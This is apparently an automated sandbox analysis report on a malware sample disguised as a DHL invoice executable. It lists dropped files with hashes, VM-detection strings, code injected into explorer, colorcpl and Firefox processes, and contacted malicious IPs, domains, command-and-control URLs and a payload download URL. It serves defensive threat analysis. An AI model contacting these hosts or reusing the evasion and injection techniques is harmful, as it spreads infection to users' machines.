Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3144	Thread sleep time: -198000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHLINV000156.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\libpkcs11-helper-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Glitteringly\pinckneya\Administrerbarest\Fyringssedlens\SolutionExplorerCLI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\percentile.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\maintenanceservice2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Supergallantness\afstres\Archives\Sadelmagernaalenes\System.Security.Cryptography.X509Certificates.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DHLINV000156.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\libdatrie-1.dll	Jump to dropped file

Source: C:\Users\user\Desktop\DHLINV000156.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\DHLINV000156.exe	API call chain: ExitProcess graph end node

Source: DHLINV000156.exe, 00000002.00000002.2494320108.00000000067B9000.00000004.00000800.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3258797063.0000000004C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: DHLINV000156.exe, 00000008.00000003.3133160993.000000000316A000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3258169453.000000000316A000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3224834534.000000000316A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW01
Source: DHLINV000156.exe, 00000002.00000002.2494320108.00000000067B9000.00000004.00000800.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3258797063.0000000004C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 0000000A.00000003.3626754747.000000000D651000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6902699355.000000000D638000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3162334795.000000000D653000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWbbbb
Source: DHLINV000156.exe, 00000008.00000002.3258797063.0000000004C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: DHLINV000156.exe, 00000002.00000002.2494320108.00000000067B9000.00000004.00000800.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3258797063.0000000004C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: DHLINV000156.exe, 00000002.00000002.2494320108.00000000067B9000.00000004.00000800.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3258797063.0000000004C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: explorer.exe, 0000000A.00000002.6924685409.000000001441E000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6879455716.00000000045D2000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6887012764.0000000004BBE000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3457016308.000000000B5DE000.00000004.80000000.00040000.00000000.sdmp, DHLINV000156.exe	Binary or memory string: qEmU&f
Source: DHLINV000156.exe, 00000002.00000002.2494320108.00000000067B9000.00000004.00000800.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3258797063.0000000004C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: DHLINV000156.exe, 00000008.00000002.3258797063.0000000004C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: DHLINV000156.exe, 00000008.00000003.3132927450.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3132927450.0000000003197000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3131797147.0000000003197000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3131797147.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3258366023.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3132388903.0000000003197000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3258366023.0000000003197000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6914647937.000000000FBCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3174779917.000000000FBCB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000000.3143756471.0000000003800000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6880980073.0000000003800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW+
Source: DHLINV000156.exe, 00000002.00000002.2494320108.00000000067B9000.00000004.00000800.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3258797063.0000000004C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: DHLINV000156.exe, 00000002.00000002.2494320108.00000000067B9000.00000004.00000800.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3258797063.0000000004C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: DHLINV000156.exe, 00000002.00000002.2494320108.00000000067B9000.00000004.00000800.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3258797063.0000000004C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: DHLINV000156.exe, 00000008.00000002.3258797063.0000000004C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\DHLINV000156.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\DHLINV000156.exe	Thread register set: target process: 4592			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Thread register set: target process: 4592			Jump to behavior

Source: explorer.exe, 0000000A.00000000.3142563248.0000000001A90000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000003.3625003060.000000000D801000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.6902699355.000000000D801000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.3140863853.0000000001388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.3142563248.0000000001A90000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.6879597675.0000000001A90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.3142563248.0000000001A90000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.6879597675.0000000001A90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.3142563248.0000000001A90000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.6879597675.0000000001A90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 9Program Manager

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.8.203	www.hot6s.com	United States	13335	CLOUDFLARENETUS	true
156.255.170.114	www.cmproutdoors.com	Seychelles	136800	XIAOZHIYUN1-AS-APICIDCNETWORKUS	true
222.122.213.231	daon3999.net	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
34.117.168.233	td-ccm-168-233.wixdns.net	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	true
64.190.63.111	www.riverflow.net	United States	11696	NBS11696US	true
37.59.221.4	nonsolopiercing.com	France	16276	OVHFR	false
3.9.182.46	www.casinoenligne-france.info	United States	16509	AMAZON-02US	true
20.239.65.138	u4tgw7dr.n.funnull35.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
199.192.30.193	www.spotcheck.site	United States	22612	NAMECHEAP-NETUS	true
38.163.2.19	www.dinggubd.net	United States	174	COGENT-174US	true
185.53.177.54	www.verde-amar.info	Germany	61969	TEAMINTERNET-ASDE	true
188.114.96.3	www.hhkk143.cfd	European Union	13335	CLOUDFLARENETUS	true
154.210.212.94	gy.adsfzcvx.com	Seychelles	136800	XIAOZHIYUN1-AS-APICIDCNETWORKUS	true
85.13.156.177	www.sem-jobs.com	Germany	34788	NMM-ASD-02742FriedersdorfHauptstrasse68DE	true
164.88.122.250	hk.ygrcw.cn	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	true
81.88.48.71	adasoft.info	Italy	39729	REGISTER-ASIT	true
173.230.227.171	popcors.com	United States	12180	INTERNAP-2BLKUS	true

Name	Malicious	Antivirus Detection	Reputation
http://www.hhkk143.cfd/i9th/?YM=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&F20=_ng1IJ	true	Avira URL Cloud: malware	unknown
http://www.popcors.com/i9th/	true	Avira URL Cloud: malware	unknown
http://www.riverflow.net/i9th/	true	Avira URL Cloud: safe	unknown
http://www.popcors.com/i9th/?F20=_ng1IJ&YM=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA==	true	Avira URL Cloud: malware	unknown
http://www.sandyhillsagritourism.com/i9th/?F20=_ng1IJ&YM=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw==	true	Avira URL Cloud: malware	unknown
http://www.daon3999.net/i9th/	true	Avira URL Cloud: safe	unknown
http://nonsolopiercing.com/wp-content/vSvXWEFHsgTrbgVnnEpdo45.bin	false	Avira URL Cloud: safe	unknown
http://www.dinggubd.net/i9th/	true	Avira URL Cloud: malware	unknown
http://www.5319ss.com/i9th/?YM=oRug1p2N3M7f21OO0lOBGqE4PfaV2grEv9VY5puRv4+mIhzAnHI5ZAphwtkKSkIVc0m4kQAL+gvPk8R76uitxElzOZBQuGepJQ==&F20=_ng1IJ	true	Avira URL Cloud: safe	unknown
http://www.dinggubd.net/i9th/?F20=_ng1IJ&YM=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw==	true	Avira URL Cloud: malware	unknown
http://www.verde-amar.info/i9th/?YM=k3d2rpkNYMKNWaTFA3t0FG4YoWbTiA9z8X9PQFaufAL9B597B9+6rAPLCs31mdZA/v+HUWU5or1J0geLcv9LMooOfPEJdI/q3g==&F20=_ng1IJ	true	Avira URL Cloud: safe	unknown
http://www.casinoenligne-france.info/i9th/	true	Avira URL Cloud: malware	unknown
http://www.yeah-go.com/i9th/	true	Avira URL Cloud: safe	unknown
http://www.hhkk143.cfd/i9th/	true	Avira URL Cloud: malware	unknown
http://www.hot6s.com/i9th/	true	Avira URL Cloud: malware	unknown
http://www.daon3999.net/i9th/?F20=_ng1IJ&YM=f7i/reR9z/XYtiufs4T2oCglTJHppPIhAuHFUSLntHIlLxYI6+YKRHThES4heztnev1TOQxmA1eDErfm329tx1/Ku+4bHpf60w==	true	Avira URL Cloud: safe	unknown
http://www.riverflow.net/i9th/?F20=_ng1IJ&YM=djsn1an+GmzwXFTB/MFsKGQXJOZQhusBpj6p6RqECbOdtpCOv2Kvcnth4kqs1edHWjVNJqZCDFfEwc47KO0/1j4B7gbgnVo+SQ==	true	Avira URL Cloud: safe	unknown
http://www.0w3jy.com/i9th/?F20=_ng1IJ&YM=uGolGY6UqX3sY/9PLVWwN9J/BTzz+6hffrhecVGN5FjI635Z0j5At+r+BPTklOB2HfIE21jETmQJryl68L/U0+pl2AIDG80kBg==	true	Avira URL Cloud: safe	unknown
http://www.spotcheck.site/i9th/	true	Avira URL Cloud: malware	unknown
http://www.verde-amar.info/i9th/	true	Avira URL Cloud: safe	unknown
http://www.adasoft.info/i9th/?F20=_ng1IJ&YM=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ==	true	Avira URL Cloud: malware	unknown

ID:	830443
Product:	CloudBasic
Start time:	11:51:52
Start date:	20.03.2023
Sample:	DHLINV000156.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	4cef4c9b4785b2bc5adcbf1c91185ab9
SHA1:	5e00a720edff53c27a6ee5fe4606a42cc2ab3a02
SHA256:	0a83a6c897b43357c341190cc93e0310cc8063f4e569853aba1c912ede95229f
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Glitteringly\pinckneya\Administrerbarest\Fyringssedlens\Discouple.Lab	data	A91E61BC886E6E67E5441F96377A9B0C	4A3D5D529C0328EED76371ED3A36D10684227303	4DC27F3A2440B1826B4E1BFE993BEE9D647F4789D775B612439F55EC76D55044
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Glitteringly\pinckneya\Administrerbarest\Fyringssedlens\Hny.Com	ASCII text, with very long lines (65536), with no line terminators	06284E5EABF1CB10DA1D5C6C6B64EACB	E8430493BC1415193507E442B4596F819BE5256B	0805F6DC1F08E82F6A7C397C19DC33E63B3EAA770F735829FB3E15EE7B344CE6
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Glitteringly\pinckneya\Administrerbarest\Fyringssedlens\SolutionExplorerCLI.dll	PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	3A03B61FA01DCDFF3E595D279F159D6E	94900C28C23AD01D311C389A0813277CFB30345C	4F4D6511BEC955B4E8A30371ED743EA5EBC87CEB0BF93FE21F0A378AA2C05A01
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\libpkcs11-helper-1.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	2455841538BA8A502398C18781CC3CEB	86CFD513FEE46EBC2C35225B27372679BE6ADA91	F37BE7BD8C46D58CA931810536C8A2BEC36D06FF3281740FE0AD177F022AC781
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\maintenanceservice2.exe	PE32+ executable (GUI) x86-64, for MS Windows	49A2E97304EF8E044EEBD7ACCAD37E11	7D0F26591C8BD4CAB1718E323B65706CBEA5DE7A	83EAFBF165642C563CD468D12BC85E3A9BAEDE084E5B18F99466E071149FD15F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\percentile.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	3144FDFEC817D0AC6FE3F4642B70328B	756C3513DC10CF00B517C72B2D3AB3E20895A46C	BF17F5B38DCF35B55B1E0FAD462D4095ABAAA4CD8F1EDBDC8657C0249EF5D4D3
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Supergallantness\afstres\Archives\Sadelmagernaalenes\System.Security.Cryptography.X509Certificates.dll	PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows	84D7B1FB924AEEFCF4A2C7A687FE2EF1	A2C2C7DE9096328A3FEF0C7FCEA262A294C0807B	32A54C24B18B3C087E06F4F19885FB410304AB4AF2263154020D3F5CDCE36D99
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\System.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	BCC32F5B608C99F89508921B6333B329	5F70BB4A3A812C399D8D2A2954C9A715574CFF61	5D4FF9A8E3B3CA26F53CD2CC4C557C5F2074A431B9CD029AE7F7A7B8902FA3C1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\libdatrie-1.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	8A54723090530190EB11AFCD5B702B1B	DFA923EC796A754BD21C4F9E504305848A4CB1B2	738F67F45FAA07CC387BAF390604EE4CE709CBE7C223D9A043EE06F7CB360D5B
C:\Users\user\AppData\Local\Temp\AeL-0b1QRQ	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 5, database pages 59, cookie 0x4f, schema 4, UTF-8, version-valid-for 5	D331C900DDE8ACB523C51D9448205C0A	BDB3366F54876E78F76A6244EDA7A4C302FEB91D	F199798DF1C37E3A8F6FFF1E208F083CF687F5C6A220DCAD42BB68F2120181CD
C:\Users\user\AppData\Local\Temp\nsxCFC.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	0063D48AFE5A0CDC02833145667B6641	E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8	AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7

Windows Analysis Report DHLINV000156.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
DHLINV000156.exe